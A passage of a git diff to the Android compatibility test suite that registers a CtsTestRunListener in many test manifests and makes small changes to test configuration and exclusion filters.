+        <meta-data android:name="listener"
+             android:value="com.android.cts.runner.CtsTestRunListener"/>
     </instrumentation>
 </manifest>
diff --git a/tests/tests/telecom2/AndroidManifest.xml b/tests/tests/telecom2/AndroidManifest.xml
index 35543c9..9bc56a7 100644
--- a/tests/tests/telecom2/AndroidManifest.xml
+++ b/tests/tests/telecom2/AndroidManifest.xml
@@ -80,5 +80,7 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
          android:targetPackage="android.telecom2.cts"
          android:label="CTS tests for android.telecom package">
+        <meta-data android:name="listener"
+             android:value="com.android.cts.runner.CtsTestRunListener"/>
     </instrumentation>
 </manifest>
diff --git a/tests/tests/telecom3/AndroidManifest.xml b/tests/tests/telecom3/AndroidManifest.xml
index a870a94..351260c 100644
--- a/tests/tests/telecom3/AndroidManifest.xml
+++ b/tests/tests/telecom3/AndroidManifest.xml
@@ -86,5 +86,7 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
          android:targetPackage="android.telecom3.cts"
          android:label="CTS tests for android.telecom package">
+        <meta-data android:name="listener"
+             android:value="com.android.cts.runner.CtsTestRunListener"/>
     </instrumentation>
 </manifest>
diff --git a/tests/tests/telephony/current/AndroidManifest.xml b/tests/tests/telephony/current/AndroidManifest.xml
index 027371a..8730f5e 100644
--- a/tests/tests/telephony/current/AndroidManifest.xml
+++ b/tests/tests/telephony/current/AndroidManifest.xml
@@ -305,6 +305,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
          android:targetPackage="android.telephony.cts"
          android:label="CTS tests of android.telephony">
+        <meta-data android:name="listener"
+             android:value="com.android.cts.runner.CtsTestRunListener"/>
     </instrumentation>
 
     <!-- Make sure the cts can connect to CarrierMessagingServices. This is needed for
diff --git a/tests/tests/telephony2/AndroidManifest.xml b/tests/tests/telephony2/AndroidManifest.xml
index 5ddbe0e..854154e 100644
--- a/tests/tests/telephony2/AndroidManifest.xml
+++ b/tests/tests/telephony2/AndroidManifest.xml
@@ -26,6 +26,8 @@
 
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:targetPackage="android.telephony2.cts">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/telephony3/AndroidManifest.xml b/tests/tests/telephony3/AndroidManifest.xml
index 7f363c9..22372b8 100644
--- a/tests/tests/telephony3/AndroidManifest.xml
+++ b/tests/tests/telephony3/AndroidManifest.xml
@@ -26,6 +26,8 @@
 
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:targetPackage="android.telephony3.cts">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/telephony4/AndroidManifest.xml b/tests/tests/telephony4/AndroidManifest.xml
index 861bb6e..aa4221f 100644
--- a/tests/tests/telephony4/AndroidManifest.xml
+++ b/tests/tests/telephony4/AndroidManifest.xml
@@ -24,6 +24,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:targetPackage="android.telephony4.cts"
                      android:label="CTS tests of android.telephony4">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/telephony5/AndroidManifest.xml b/tests/tests/telephony5/AndroidManifest.xml
index bdf4e30..22950a6 100644
--- a/tests/tests/telephony5/AndroidManifest.xml
+++ b/tests/tests/telephony5/AndroidManifest.xml
@@ -27,6 +27,8 @@
 
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:targetPackage="android.telephony5.cts">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/text/AndroidManifest.xml b/tests/tests/text/AndroidManifest.xml
index e47e10c..33380f6 100644
--- a/tests/tests/text/AndroidManifest.xml
+++ b/tests/tests/text/AndroidManifest.xml
@@ -89,6 +89,8 @@
     <instrumentation android:name="android.text.cts.runner.CtsTextRunner"
          android:targetPackage="android.text.cts"
          android:label="CTS tests of android.text">
+        <meta-data android:name="listener"
+             android:value="com.android.cts.runner.CtsTestRunListener"/>
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/textclassifier/AndroidManifest.xml b/tests/tests/textclassifier/AndroidManifest.xml
index 3271b5e..12b4c8a 100644
--- a/tests/tests/textclassifier/AndroidManifest.xml
+++ b/tests/tests/textclassifier/AndroidManifest.xml
@@ -40,6 +40,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:targetPackage="android.view.textclassifier.cts"
                      android:label="CTS tests of android.view.textclassifier">
+        <meta-data android:name="listener"
+                   android:value="com.android.cts.runner.CtsTestRunListener"/>
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/theme/AndroidManifest.xml b/tests/tests/theme/AndroidManifest.xml
index 194354f..0264cbf 100644
--- a/tests/tests/theme/AndroidManifest.xml
+++ b/tests/tests/theme/AndroidManifest.xml
@@ -26,6 +26,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
             android:targetPackage="android.theme.cts"
             android:label="CTS tests for themes">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 </manifest>
 
diff --git a/tests/tests/time/AndroidManifest.xml b/tests/tests/time/AndroidManifest.xml
index 71b0649..71b7a53 100644
--- a/tests/tests/time/AndroidManifest.xml
+++ b/tests/tests/time/AndroidManifest.xml
@@ -36,6 +36,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
         android:targetPackage="android.time.cts"
         android:label="CTS tests for android.time">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/toast/AndroidManifest.xml b/tests/tests/toast/AndroidManifest.xml
index f32d16e..9b0804f 100644
--- a/tests/tests/toast/AndroidManifest.xml
+++ b/tests/tests/toast/AndroidManifest.xml
@@ -26,6 +26,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
         android:targetPackage="android.widget.toast.cts"
         android:label="CTS tests for toast windows">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/toastlegacy/AndroidManifest.xml b/tests/tests/toastlegacy/AndroidManifest.xml
index 65b02be..df11613 100644
--- a/tests/tests/toastlegacy/AndroidManifest.xml
+++ b/tests/tests/toastlegacy/AndroidManifest.xml
@@ -27,6 +27,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
         android:targetPackage="android.widget.toast.legacy.cts"
         android:label="CTS tests for legacy toast windows">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/tools/processors/view_inspector/AndroidManifest.xml b/tests/tests/tools/processors/view_inspector/AndroidManifest.xml
index 8b90543..a5399b1 100644
--- a/tests/tests/tools/processors/view_inspector/AndroidManifest.xml
+++ b/tests/tests/tools/processors/view_inspector/AndroidManifest.xml
@@ -27,6 +27,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:targetPackage="android.processor.view.inspector.cts"
                      android:label="CTS tests of android.processor.view.inspector">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/transition/AndroidManifest.xml b/tests/tests/transition/AndroidManifest.xml
index 8b3da0d..f2d7001 100644
--- a/tests/tests/transition/AndroidManifest.xml
+++ b/tests/tests/transition/AndroidManifest.xml
@@ -29,6 +29,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:targetPackage="android.transition.cts"
                      android:label="CTS tests for android.transition package">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 </manifest>
 
diff --git a/tests/tests/tv/AndroidManifest.xml b/tests/tests/tv/AndroidManifest.xml
index ea73dbb..15b97ac 100644
--- a/tests/tests/tv/AndroidManifest.xml
+++ b/tests/tests/tv/AndroidManifest.xml
@@ -188,5 +188,7 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
          android:targetPackage="android.tv.cts"
          android:label="Tests for the TV APIs.">
+        <meta-data android:name="listener"
+             android:value="com.android.cts.runner.CtsTestRunListener"/>
     </instrumentation>
 </manifest>
diff --git a/tests/tests/uiautomation/AndroidManifest.xml b/tests/tests/uiautomation/AndroidManifest.xml
index 1ff02a5..edf730d 100644
--- a/tests/tests/uiautomation/AndroidManifest.xml
+++ b/tests/tests/uiautomation/AndroidManifest.xml
@@ -51,6 +51,8 @@
 
   <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
        android:targetPackage="android.app.uiautomation.cts">
+        <meta-data android:name="listener"
+             android:value="com.android.cts.runner.CtsTestRunListener"/>
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/uidisolation/AndroidManifest.xml b/tests/tests/uidisolation/AndroidManifest.xml
index 3dfbf0e..0872521 100644
--- a/tests/tests/uidisolation/AndroidManifest.xml
+++ b/tests/tests/uidisolation/AndroidManifest.xml
@@ -36,6 +36,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:targetPackage="android.uidisolation.cts"
                      android:label="CTS tests of android.uidisolation">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 </manifest>
 
diff --git a/tests/tests/uidmigration/AndroidManifest.xml b/tests/tests/uidmigration/AndroidManifest.xml
index 5ee31b4..c3530da 100644
--- a/tests/tests/uidmigration/AndroidManifest.xml
+++ b/tests/tests/uidmigration/AndroidManifest.xml
@@ -23,6 +23,9 @@
         android:name="androidx.test.runner.AndroidJUnitRunner"
         android:targetPackage="android.uidmigration.cts"
         android:label="CTS tests of android.uidmigration" >
+        <meta-data
+            android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/usb/AndroidManifest.xml b/tests/tests/usb/AndroidManifest.xml
index 9bde1f2..30345e0 100644
--- a/tests/tests/usb/AndroidManifest.xml
+++ b/tests/tests/usb/AndroidManifest.xml
@@ -25,6 +25,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:targetPackage="android.usb.cts"
                      android:label="CTS tests of USB component">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/util/AndroidManifest.xml b/tests/tests/util/AndroidManifest.xml
index e017789..bcb9bb8 100644
--- a/tests/tests/util/AndroidManifest.xml
+++ b/tests/tests/util/AndroidManifest.xml
@@ -29,6 +29,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:targetPackage="android.util.cts"
                      android:label="CTS tests of android.util">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/vcn/AndroidManifest.xml b/tests/tests/vcn/AndroidManifest.xml
index 87525a1..ac0625c 100644
--- a/tests/tests/vcn/AndroidManifest.xml
+++ b/tests/tests/vcn/AndroidManifest.xml
@@ -35,6 +35,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:targetPackage="android.net.vcn.cts"
                      android:label="CTS tests of android.net.vcn">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/view/AndroidManifest.xml b/tests/tests/view/AndroidManifest.xml
index f6e8481..47622f7 100644
--- a/tests/tests/view/AndroidManifest.xml
+++ b/tests/tests/view/AndroidManifest.xml
@@ -513,6 +513,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
          android:targetPackage="android.view.cts"
          android:label="CTS tests of android.view">
+        <meta-data android:name="listener"
+             android:value="com.android.cts.runner.CtsTestRunListener"/>
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/view/sdk28/AndroidManifest.xml b/tests/tests/view/sdk28/AndroidManifest.xml
index 7e6b7a7..4ebefad0 100644
--- a/tests/tests/view/sdk28/AndroidManifest.xml
+++ b/tests/tests/view/sdk28/AndroidManifest.xml
@@ -36,6 +36,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:targetPackage="android.view.cts.sdk28"
                      android:label="CTS tests of android.view">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/virtualdevice/AndroidManifest.xml b/tests/tests/virtualdevice/AndroidManifest.xml
index 68fedd7..8d99779 100644
--- a/tests/tests/virtualdevice/AndroidManifest.xml
+++ b/tests/tests/virtualdevice/AndroidManifest.xml
@@ -45,6 +45,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:targetPackage="android.virtualdevice.cts"
                      android:label="CTS tests of android.companion.virtual">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/voiceRecognition/AndroidManifest.xml b/tests/tests/voiceRecognition/AndroidManifest.xml
index 796c507..b402802 100644
--- a/tests/tests/voiceRecognition/AndroidManifest.xml
+++ b/tests/tests/voiceRecognition/AndroidManifest.xml
@@ -43,5 +43,7 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
          android:targetPackage="android.voicerecognition.cts"
          android:label="CTS tests of android voicerecognition">
+        <meta-data android:name="listener"
+             android:value="com.android.cts.runner.CtsTestRunListener"/>
     </instrumentation>
 </manifest>
diff --git a/tests/tests/voiceinteraction/AndroidManifest.xml b/tests/tests/voiceinteraction/AndroidManifest.xml
index 50d2b0f..090c661 100644
--- a/tests/tests/voiceinteraction/AndroidManifest.xml
+++ b/tests/tests/voiceinteraction/AndroidManifest.xml
@@ -245,5 +245,7 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
          android:targetPackage="android.voiceinteraction.cts"
          android:label="CTS tests of android.voiceinteraction">
+        <meta-data android:name="listener"
+             android:value="com.android.cts.runner.CtsTestRunListener"/>
     </instrumentation>
 </manifest>
diff --git a/tests/tests/voiceinteraction/AndroidTest.xml b/tests/tests/voiceinteraction/AndroidTest.xml
index 6191ac9..a69379f 100644
--- a/tests/tests/voiceinteraction/AndroidTest.xml
+++ b/tests/tests/voiceinteraction/AndroidTest.xml
@@ -49,4 +49,11 @@
         <option name="package" value="android.voiceinteraction.cts" />
         <option name="runtime-hint" value="11m" />
     </test>
+
+    <!-- This test is included as part of GTS 11 but is built against U SDK.
+         Skip on non-U devices. -->
+    <object type="module_controller"
+            class="com.android.tradefed.testtype.suite.module.MinApiLevelModuleController">
+        <option name="min-api-level" value="34" />
+    </object>
 </configuration>
diff --git a/tests/tests/voicesettings/AndroidManifest.xml b/tests/tests/voicesettings/AndroidManifest.xml
index c1ebf25..ba50604 100644
--- a/tests/tests/voicesettings/AndroidManifest.xml
+++ b/tests/tests/voicesettings/AndroidManifest.xml
@@ -40,5 +40,7 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
          android:targetPackage="android.voicesettings.cts"
          android:label="CTS tests of android.voicesettings">
+        <meta-data android:name="listener"
+             android:value="com.android.cts.runner.CtsTestRunListener"/>
     </instrumentation>
 </manifest>
diff --git a/tests/tests/webkit/AndroidManifest.xml b/tests/tests/webkit/AndroidManifest.xml
index d97716c..96e9e6c 100644
--- a/tests/tests/webkit/AndroidManifest.xml
+++ b/tests/tests/webkit/AndroidManifest.xml
@@ -105,6 +105,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
          android:targetPackage="android.webkit.cts"
          android:label="CTS tests of android.webkit">
+        <meta-data android:name="listener"
+             android:value="com.android.cts.runner.CtsTestRunListener"/>
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/widget/AndroidManifest.xml b/tests/tests/widget/AndroidManifest.xml
index f03dd26..a14568f 100644
--- a/tests/tests/widget/AndroidManifest.xml
+++ b/tests/tests/widget/AndroidManifest.xml
@@ -737,6 +737,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
          android:targetPackage="android.widget.cts"
          android:label="CTS tests of android.widget">
+        <meta-data android:name="listener"
+             android:value="com.android.cts.runner.CtsTestRunListener"/>
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/widget29/AndroidManifest.xml b/tests/tests/widget29/AndroidManifest.xml
index 89d63b5..d338368 100644
--- a/tests/tests/widget29/AndroidManifest.xml
+++ b/tests/tests/widget29/AndroidManifest.xml
@@ -39,6 +39,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
          android:targetPackage="android.widget.cts29"
          android:label="(SDK 29) CTS tests of android.widget">
+        <meta-data android:name="listener"
+             android:value="com.android.cts.runner.CtsTestRunListener"/>
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/wifi/AndroidManifest.xml b/tests/tests/wifi/AndroidManifest.xml
index c618fc5..b3fbee0 100644
--- a/tests/tests/wifi/AndroidManifest.xml
+++ b/tests/tests/wifi/AndroidManifest.xml
@@ -57,6 +57,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:targetPackage="android.net.wifi.cts"
                      android:label="CTS tests of android.net.wifi">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 </manifest>
 
diff --git a/tests/video/AndroidManifest.xml b/tests/video/AndroidManifest.xml
index f0ffb88..8cdc050 100644
--- a/tests/video/AndroidManifest.xml
+++ b/tests/video/AndroidManifest.xml
@@ -30,6 +30,9 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
             android:targetPackage="android.video.cts"
             android:label="CTS tests for Video" >
+        <meta-data
+            android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
     <uses-sdk android:minSdkVersion="29"   android:targetSdkVersion="29" />
 </manifest>
diff --git a/tests/videocodec/AndroidManifest.xml b/tests/videocodec/AndroidManifest.xml
index 3fa4c61..14e2f31 100644
--- a/tests/videocodec/AndroidManifest.xml
+++ b/tests/videocodec/AndroidManifest.xml
@@ -31,5 +31,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
         android:targetPackage="android.videocodec.cts"
         android:label="CTS VideoCodec tests of android.videocodec" >
+        <meta-data
+            android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 </manifest>
diff --git a/tests/vr/Android.bp b/tests/vr/Android.bp
index c396922..6b145c9 100644
--- a/tests/vr/Android.bp
+++ b/tests/vr/Android.bp
@@ -37,7 +37,7 @@
         ":CtsVerifierMockVrListenerServiceFiles",
     ],
     sdk_version: "test_current",
-    min_sdk_version: "14",
+    min_sdk_version: "19",
     // Tag this module as a cts test artifact
     test_suites: [
         "cts",
diff --git a/tests/vr/AndroidManifest.xml b/tests/vr/AndroidManifest.xml
index 5925618..0196566 100644
--- a/tests/vr/AndroidManifest.xml
+++ b/tests/vr/AndroidManifest.xml
@@ -25,6 +25,8 @@
     <uses-feature android:glEsVersion="0x00020000"/>
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
          android:targetPackage="android.vr.cts">
+        <meta-data android:name="listener"
+             android:value="com.android.cts.runner.CtsTestRunListener"/>
     </instrumentation>
 
     <application android:icon="@drawable/ic_launcher"
diff --git a/tools/cts-tradefed/res/config/cts-exclude.xml b/tools/cts-tradefed/res/config/cts-exclude.xml
index 2b9e674..b754596 100644
--- a/tools/cts-tradefed/res/config/cts-exclude.xml
+++ b/tools/cts-tradefed/res/config/cts-exclude.xml
@@ -33,16 +33,4 @@
     <!-- Exclude @SecurityTest tests from CTS. These are tested in STS. b/180417031-->
     <option name="compatibility:test-arg" value="com.android.tradefed.testtype.AndroidJUnitTest:exclude-annotation:android.platform.test.annotations.AsbSecurityTest" />
     <option name="compatibility:test-arg" value="com.android.compatibility.common.tradefed.testtype.JarHostTest:exclude-annotation:android.platform.test.annotations.AsbSecurityTest" />
-
-    <!-- Exclude JvmtiHostTest911 as it's tested in MTS and depends on implementation details of the ART module. http://b/286797612 -->
-    <option name="compatibility:exclude-filter" value="CtsJvmtiRunTest911HostTestCases" />
-    <!-- Exclude few tests as it depends on implementation details of the ART module. b/287732826 -->
-    <option name="compatibility:exclude-filter" value="CtsJvmtiRunTest913HostTestCases" />
-    <option name="compatibility:exclude-filter" value="CtsJvmtiRunTest912HostTestCases" />
-    <option name="compatibility:exclude-filter" value="CtsJvmtiRunTest988HostTestCases" />
-
-    <!-- Exclude art_standalone_dex2oat_cts_tests which cannot link with recent
-         ART module due to internal library symbol changes. b/288212464#comment5 -->
-    <option name="compatibility:exclude-filter" value="art_standalone_dex2oat_cts_tests" />
-
 </configuration>